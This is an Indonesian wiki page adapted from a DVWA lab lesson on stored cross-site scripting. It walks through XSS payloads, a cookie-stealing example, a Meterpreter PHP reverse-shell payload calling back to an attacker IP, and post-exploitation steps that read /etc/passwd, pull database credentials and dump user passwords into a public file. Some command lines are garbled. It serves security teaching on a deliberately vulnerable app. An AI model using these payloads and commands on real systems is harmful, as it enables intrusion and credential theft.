DVWA: XSS

From OnnoWiki
Jump to navigation Jump to search

sumber: http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson9/index.html

Tujuan

  • Test a basic cross site scripting (XSS) attack
  • Test an iframe cross site scripting (XSS) attack
  • Test a cookie cross site scripting (XSS) attack
  • Create a php/meterpreter/reverse_tcp payload
  • Start the php/meterpreter/reverse_tcp listener
  • Upload the PHP payload to the DVWA Upload screen
  • Test a PHP Payload cross site scripting (XSS) attack


Di sisi DVWA

Cek IP

ifconfig


Fix Stored Cross Site Scripting (XSS) Comment Box

Edit index.php

cd /var/www/html/DVWA-1.9/vulnerabilities/xss_s/
vi index.php

Search dengan keyword mtxMessage Ubah maxlength=50

<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"50\"></textarea>

menjadi maxlength=250

<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"250\"></textarea>

Di sisi Kali Linux

Cek IP Kali Linux

ifconfig -a

Enable Javascript di Browser

Buka Firefox
Preferences > Content > Uncheck - Block pop-up windows

Masuk ke DVWA

  • Login
  • DVWA Security > Low

XSS Stored Basic Exploit Test

  • Klik > XSS (Stored)
  • Pada Name isi "Test 1"
  • Pada Message isi "<script>alert("This is a XSS Exploit Test")</script>"
  • Klik > Sign Guestbook

XSS Stored IFRAME Exploit Test

  • Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
  • Klik > XSS (Stored)
  • Pada Nama isi "Test 2"
  • Pada Message isi "<iframe src="http://www.cnn.com"></iframe>"
  • Klik > Sign Guestbook

Tampak bahwa CNN muncul di bawah "Test 2" .

       This is a powerful exploit because a user could use SET to create Malicious cloned website and place in here.
           e.g., Social Engineering Toolkit (SET): Lesson 3: Create Malicious Weblink, Install Virus, Capture Forensic Images

XSS Stored COOKIE Exploit Test

  • Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
  • Klik > XSS (Stored)
  • Pada Nama isi "Test 3"
  • Pada Message isi "<script>alert(document.cookie)</script>"
  • Klik > Sign Guestbook


   Below is the cookie/session that the webserver establishes with the current browser session.
   An attacker could easily modify this XSS script to send the cookie to a remote location instead of displaying it.
   Image if this was a bank website. Every time a user logs in their cookie information could be sent to a remote location.


Build PHP msfpayload

   mkdir -p /root/backdoor
   cd /root/backdoor
   msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > FORUM_BUG.php
   ls -l FORUM_BUG.php


   Select "Upload" from the left navigation menu.
   Click Browse

Start msfconsole


       msfconsole

use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST 192.168.1.105 set LPORT 4444 exploit


XSS Stored window.location Exploit Test

  • Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
  • Klik > XSS (Stored)

Name: Test 4 Message:

   <script>window.location="http://192.168.0.100/DVWA-1.9/hackable/uploads/FORUM_BUG.php" </script>
       Replace 192.168.1.106 with the IP Address obtain from Fedora 14 in (Section 3, Step 3).

Click Sign Guestbook Click OK when the Test 1 Message is displayed

shell

   Establishes a "sh" shell.

tail /etc/passwd

   This produces a potential prospect list for a ssh brute force attack
   whoami
       Displays the name of the user.
   grep apache /etc/passwd
       The goal of this command is obtaining the home directory for the apache username.
   find /var/www/* -print | grep config
       Here I am wanting to find all the configuration files in the /var/www directory.


   grep "db_" /var/www/html/dvwa/config/config.inc.php
       This produces the database name, username, and password information to log into the mysql database.
   echo "use dvwa; show tables;" | mysql -uroot -p123456
       This command produces a table list of the dvwa database.
   echo "use dvwa; desc users;" | mysql -uroot -p123456
       This command describes the columns of the users table in the dvwa datase.
   echo "select user,password from dvwa.users;" | mysql -uroot -p123456
       This command displays the user and password information for each user in the dvwa.users table.


echo "

" >> /var/www/html/dvwa/hackable/uploads/xss.html
        Place the html <pre> tag in the xss.html file.
        The <pre> is used as a pre-formatter.
    echo "select user,password from dvwa.users;" | mysql -uroot -p123456 >> /var/www/html/dvwa/hackable/uploads/xss.html
        Place user and password for the dvwa.users table in the xss.html file.
    echo "

" >> /var/www/html/dvwa/hackable/uploads/xss.html Place the close html tag in the xss.html file.

   echo "
Your Name
" >> /var/www/html/dvwa/hackable/uploads/xss.html Replace the string "Your Name" with your actual name. date >> /var/www/html/dvwa/hackable/uploads/xss.html



   On BackTrack, place the below URI in Firefox
       http://192.168.0.100/DVWA-1.9/hackable/uploads/xss.html
           Replace the above IP address with the IP Address obtained in (Section 3, Step 3).

Referensi